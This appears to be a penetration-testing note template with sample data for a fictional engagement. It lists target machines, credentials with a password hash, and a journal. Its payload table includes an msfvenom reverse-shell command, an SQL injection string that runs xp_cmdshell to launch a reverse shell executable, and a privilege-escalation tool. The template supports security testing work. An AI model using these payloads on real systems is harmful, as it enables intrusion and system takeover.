✏️ Overview

<aside> 🗒️ Name

Company XY pentest

</aside>

<aside> 📅 Time Frame

12 Jan 2024 - 14 Jan 2024

</aside>

<aside> 🎯 Goal

Obtain domain admin account

</aside>

<aside> 📝 Description

This template is designed to streamline the documentation process during penetration testing. It is divided into four main sections: Machines, Attacks & Payloads, Credentials, and Journal. The key to effectively using this template is to continuously update each section with new findings and details as your exploration progresses. You can remove this section or replace it with the complete task description. Keep in mind that this is not a Pentest Report.

</aside>

🖥️ Machines

Name IP Is Pwned Is in domain Has AV Has FW Operating System Observations Successful Attack Vector Open Ports Additional Notes
Alpha-Node 192.168.1.101 Windows 10 SMB Vulnerability, RDP Brute Force 135, 445, 3389 SMB seems vulnerable to EternalBlue
Beta-Server 192.168.1.102 Ubuntu 18.04 SSH Weak Credentials, Exposed FTP SSH using found credentials 22, 21, 80 Credentials found in previous breach dump
Gamma-Box 192.168.1.103 CentOS 7 Outdated Apache Server, Misconfigured sudo 80

☑️ Attacks & Payloads

Machine Attack Vector Prerequisites Payload Additional Notes
Alpha-Node SQLi on /login msfvenom -p windows/shell_reverse_tcp

download payload, store in temp, run it | ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; — | use GodPotato to escalate privileges to nt authority\system |

👥 Credentials

Username Hash Password Is domain user Purpose Additional Notes
admin password123 Admin login for Gamma-Box Common password, easily guessed.
jdoe summer2024! SSH access to Beta-Server Password obtained in phishing attack.
backup_user 8846f7eaee8fb117ad06bdd830b7586c Backup service on Alpha-Node Long time to crack using rockyou.txt.

📘 Journal

Timestamp Machine Note
12:34 Beta-Server Found common credentials using a previously known breach database. Gained SSH access.